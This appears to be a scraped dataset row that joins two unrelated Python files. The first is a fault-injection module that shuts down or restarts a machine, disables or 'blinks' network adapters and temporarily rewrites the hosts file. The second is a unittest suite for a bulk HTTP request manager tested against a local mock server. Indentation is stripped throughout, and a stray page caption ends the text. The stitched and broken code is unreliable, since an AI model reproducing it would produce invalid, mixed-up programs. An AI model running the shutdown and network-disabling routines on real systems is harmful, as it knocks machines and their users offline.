# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Node tools command."""
from os import system, path, sep
from time import time, sleep
from threading import Thread
from inspect import isfunction
from locust.common import (parse_args_list, message_wrapper, sudo_require,
convert_timeout)
from locust.common import IS_WINDOWS
if IS_WINDOWS:
#pylint: disable=F0401
from win32api import GetSystemDirectory as sys_path
else:
#pylint: disable=E0611
from netifaces import interfaces
def _run_thread(target, args=None, ret_msg=''):
"""Run given function in separate Thread """
assert isfunction(target), "Target should be a function"
args = args or ()
assert isinstance(args, tuple), "Args should be a tuple or empty"
thread = Thread(target=target, args=args)
thread.start()
return message_wrapper(ret_msg)
@sudo_require
def shutdown_node():
"""Shutdown local node."""
return _run_thread(_shutdown_node, ret_msg='Node is shut down')
def _shutdown_node():
"""Shutdown local node."""
sleep(3)
if IS_WINDOWS:
system("shutdown /p /f")
else:
system("shutdown -h now")
@sudo_require
def restart_node():
"""Restart local node."""
return _run_thread(_restart_node, ret_msg='Node is restarted')
def _restart_node():
"""Restart local node in thread."""
sleep(3)
if IS_WINDOWS:
system("shutdown /r /f")
else:
system("shutdown -r now")
@sudo_require
def disable_network_adapters(adapters=None, timeout=0):
"""
Disable network adapters.
Arguments:
adapters - list of network adapters to disable.
If list is empty, all adapters will be disabled.
timeout - amount of seconds while network adapters will be disabled
Default value - 0.
"""
timeout = convert_timeout(timeout, def_timeout=0)
adapters = parse_args_list(adapters)
return _run_thread(_disable_network_adapters, args=(adapters, timeout),
ret_msg='Network adapter is disabled')
@sudo_require
def enable_network_adapters(adapters=None):
"""
Enable network adapters.
Arguments:
adapters - list of network adapters to disable.
If list is empty, all adapters will be enabled.
"""
loc_adapters = parse_args_list([] if adapters is None else adapters)
result = True
if IS_WINDOWS:
cmd_ptrn = 'wmic path win32_networkadapter ' \
'where PhysicalAdapter=True call enable'
if loc_adapters:
cmd_ptrn = 'netsh interface set interface name="{name}" ' \
'admin=enabled'
else:
cmd_ptrn = 'ifconfig {name} up'
# Ubuntu bug: https://bugs.launchpad.net/ubuntu/
# +source/gnome-settings-daemon/+bug/1072518
# os.system('service networking restart')
if not loc_adapters:
loc_adapters = interfaces()
if loc_adapters:
for adapter in loc_adapters:
retcode = system(cmd_ptrn.format(name=adapter))
if retcode != 0:
result = False
else:
#compare operation return bool value
result = 0 == system(cmd_ptrn)
if result:
return message_wrapper('Network adapter is enabled')
return message_wrapper('Network adapter is not enabled', status='error')
def _disable_network_adapters(adapters=None, timeout=0):
"""
Disable network adapters.
Arguments:
adapters - list of network adapters to disable.
If list is empty, all adapters will be disabled.
timeout - amount of seconds while network adapters will be disabled
Default value - 0.
"""
sleep(3)
if IS_WINDOWS:
cmd_ptrn = 'wmic path win32_networkadapter ' \
'where PhysicalAdapter=True call disable'
if adapters:
cmd_ptrn = 'netsh interface set interface name="{name}" ' \
'admin=disabled'
else:
cmd_ptrn = 'ifconfig {name} down'
if not adapters:
adapters = interfaces()
if adapters:
for adapter in adapters:
system(cmd_ptrn.format(name=adapter))
else:
system(cmd_ptrn)
if timeout:
sleep(timeout)
enable_network_adapters(adapters)
@sudo_require
def list_network_adapters():
"""
Return list of network adapters.
Argument:
None
Return:
List of network adapters dicts.
"""
if IS_WINDOWS:
#pylint: disable=F0401
from wmi import WMI
query = "select * from Win32_NetworkAdapter where PhysicalAdapter=TRUE"
result = WMI().query(query)
net_adapters = [i.NetConnectionID for i in result if i.PhysicalAdapter]
else:
net_adapters = interfaces()
return net_adapters
@sudo_require
def blink_networking(enable_network_timeout, disable_network_timeout,
adapters=None, timeout=30):
"""
Blink network adapters.
Arguments:
adapters - list of network adapters to blink;
If list is empty, all adapters will be disabled;
enable_network_timeout - timeout when adapters will be enable;
disable_network_timeout - timeout when adapters will be disable;
work_time - duration of blink networking.
Example:
butcher-agent blink networking 10 5 --adapters=eth0 --work_time=30
"""
adapters = parse_args_list(adapters)
timeout = convert_timeout(timeout, def_timeout=0)
enable_network_timeout = convert_timeout(enable_network_timeout,
def_timeout=1)
disable_network_timeout = convert_timeout(disable_network_timeout,
def_timeout=1)
return _run_thread(_blink_networking, args=(enable_network_timeout,
disable_network_timeout,
adapters, timeout),
ret_msg='Network blinking is started')
def _blink_networking(enable_network_timeout, disable_network_timeout,
adapters=None, timeout=0):
"""
Blink network adapters.
Arguments:
adapters - list of network adapters to blink.
If list is empty, all adapters will be disabled.
enable_network_timeout - timeout when adapters will be enable
disable_network_timeout - timeout when adapters will be disable
timeout - amount of seconds while adapters will be disabled.
Default value - 0.
"""
sleep(3)
if timeout:
end_time = time() + timeout
else:
end_time = time()
while True:
_disable_network_adapters(adapters=adapters,
timeout=disable_network_timeout)
sleep(enable_network_timeout)
if time() > end_time:
break
return message_wrapper('Network blinking is finished')
@sudo_require
def block_dnsname(dnsname, timeout=30):
"""
Redirect dnsname to localhost
Arguments:
dnsname - list of DNS names that will be redirected to localhost
timeout - how long changes will take affect (Default: 30 sec)
"""
dnsname = parse_args_list(dnsname)
timeout = convert_timeout(timeout, def_timeout=30)
return _run_thread(_block_dnsname, args=(dnsname, timeout),
ret_msg='Redirect dnsname to localhost is started')
def _block_dnsname(dnsname, timeout):
"""
Redirect dnsname to localhost
Arguments:
dnsname - list of DNS names that will be redirected to localhost
timeout - how long changes will take affect
"""
args = ['etc', 'hosts']
if IS_WINDOWS:
args = [sys_path(), 'drivers'] + args
else:
args.insert(0, sep)
#pylint: disable=W0142
host_path = path.join(*args)
with open(host_path, 'a+') as open_file:
hosts_value = open_file.read()
open_file.seek(0, 2)
open_file.writelines(['\n127.0.0.1 ' + each for each in dnsname])
sleep(timeout)
#return previous values
with open(host_path, 'w') as open_file:
open_file.write(hosts_value)
|
test_bulkreq.py
|
import time
import unittest
from .mocks.httpserver import MockHTTPServer
from threading import Thread
from concurrent.futures import Future
from performance.driver.classes.channel.utils.bulk import \
injectResultTimestampFn, Request, RequestPool, BulkRequestManager
def createRequestWithFuture():
"""
Creates a `Request` and populates the `future` field in the same way
the `BulkRequestManager` populates it when the request is placed.
"""
req = Request('http://127.0.0.1:40506', 'test')
req.future = injectResultTimestampFn(Future())
return req
class TestBulkRequestManager(unittest.TestCase):
def test_injectResultTimestampFn(self):
"""
Test if the `injectResultTimestampFn` correctly replaces the
set `set_result` and `set_exception` methods.
"""
# Test the presence of the `resultTime` field
future = Future()
self.assertFalse(hasattr(future, 'resultTime'))
injectResultTimestampFn(future)
self.assertTrue(hasattr(future, 'resultTime'))
# The resultTime should contain the time of the result set
future = injectResultTimestampFn(Future())
ts = time.time()
future.set_result(123)
self.assertTrue(future.done())
self.assertLessEqual(future.resultTime - ts, 0.01) # We have 10 ms tolerance
# The resultTime should contain the time of the exception set
future = injectResultTimestampFn(Future())
ts = time.time()
future.set_exception(RuntimeError('Foobar'))
self.assertTrue(future.done())
self.assertLessEqual(future.resultTime - ts, 0.01) # We have 10 ms tolerance
def test_RequestPool_waitOne(self):
"""
Test if the requestPool properly exits when a single future is completed
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def completeThread():
time.sleep(0.01)
req1.future.set_result(123)
# Start complete thread and wait for one request
Thread(target=completeThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqF = pool.waitOne(timeout=1)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 0.5)
# Completed items are removed
self.assertEqual(len(pool), 1)
# Validate
self.assertEqual(reqF, req1)
self.assertTrue(req1.future.done())
self.assertFalse(req2.future.done())
def test_RequestPool_waitAll(self):
"""
Test if the requestPool properly exits when a all futures are completed
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def completeThread():
time.sleep(0.01)
req1.future.set_result(123)
time.sleep(0.09)
req2.future.set_result(234)
# Start complete thread and wait for one request
Thread(target=completeThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqAll = pool.waitAll(timeout=1.5)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 1.25)
# Completed items are removed
self.assertEqual(len(pool), 0)
# Validate
self.assertCountEqual(reqAll, [req1, req2])
self.assertTrue(req1.future.done())
self.assertTrue(req2.future.done())
def test_RequestPool_waitOne_interrupt(self):
"""
Test if the requestPool properly gets interrupted when waiting for one
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def interruptThread():
time.sleep(0.01)
pool.interrupt()
# Start complete thread and wait for one request
Thread(target=interruptThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqF = pool.waitOne(timeout=1)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 0.5)
# Nothing should have been removed
self.assertEqual(len(pool), 2)
# Validate
self.assertEqual(reqF, None)
self.assertFalse(req1.future.done())
self.assertFalse(req2.future.done())
def test_RequestPool_waitAll_interrupt(self):
"""
Test if the requestPool properly gets interrupted when waiting for all
"""
pool = RequestPool()
# Put two futures
req1 = createRequestWithFuture()
req2 = createRequestWithFuture()
self.assertEqual(len(pool), 0)
pool.append(req1)
pool.append(req2)
self.assertEqual(len(pool), 2)
# Complete first future in a thread
def interruptThread():
time.sleep(0.01)
pool.interrupt()
# Start complete thread and wait for one request
Thread(target=interruptThread, daemon=True).start()
# Wait for all of them, making sure that we did not time out
# (Note that timeout does not raise an exception)
ts = time.time()
reqF = pool.waitAll(timeout=1)
deltaTs = time.time() - ts
self.assertLessEqual(deltaTs, 0.5)
# Nothing should have been removed
self.assertEqual(len(pool), 2)
# Validate
self.assertEqual(reqF, [])
self.assertFalse(req1.future.done())
self.assertFalse(req2.future.done())
def test_BulkRequestManager_simple(self):
"""
Test if the the BulkRequestManager can place a simple HTTP request
"""
manager = BulkRequestManager()
server = MockHTTPServer()
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule a single request
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# Check
self.assertEqual(server.totalConnections, 1)
self.assertEqual(server.totalRequests, 1)
self.assertEqual(len(completed), 1)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
def test_BulkRequestManager_many(self):
"""
Test if the the BulkRequestManager can place a many HTTP requests
"""
manager = BulkRequestManager()
server = MockHTTPServer()
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule multiple HTTP requests
for i in range(0, 100):
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# By default, the number of workers is 2, so there will be no more
# than two connections
self.assertEqual(server.totalConnections, 2)
# Check if the requests were placed correctly
self.assertEqual(server.totalRequests, 100)
self.assertEqual(len(completed), 100)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
def test_BulkRequestManager_parallel(self):
"""
Test if the the BulkRequestManager can place many parallel requests
"""
manager = BulkRequestManager(parallel=10)
server = MockHTTPServer(fakeLattency=0.1)
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule multiple HTTP requests
for i in range(0, 100):
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# There should be 10 total connections
self.assertEqual(server.totalConnections, 10)
# Check if the requests were placed correctly
self.assertEqual(server.totalRequests, 100)
self.assertEqual(len(completed), 100)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
def test_BulkRequestManager_bulk(self):
"""
Test if the the BulkRequestManager can place many burst requests
"""
manager = BulkRequestManager(burst=10)
server = MockHTTPServer(fakeLattency=0.1)
# Start a local mock server
server.start()
url = 'http://127.0.0.1:{}'.format(server.port)
# Schedule multiple HTTP requests
for i in range(0, 100):
manager.enqueue(Request(url))
# Execute
(completed, failed) = manager.execute().result()
manager.session.close()
server.stop()
# There should be 10 total connections
self.assertEqual(server.totalConnections, 10)
# Check if the requests were placed correctly
self.assertEqual(server.totalRequests, 100)
self.assertEqual(len(completed), 100)
self.assertEqual(len(failed), 0)
self.assertEqual(completed[0].status_code, 200)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.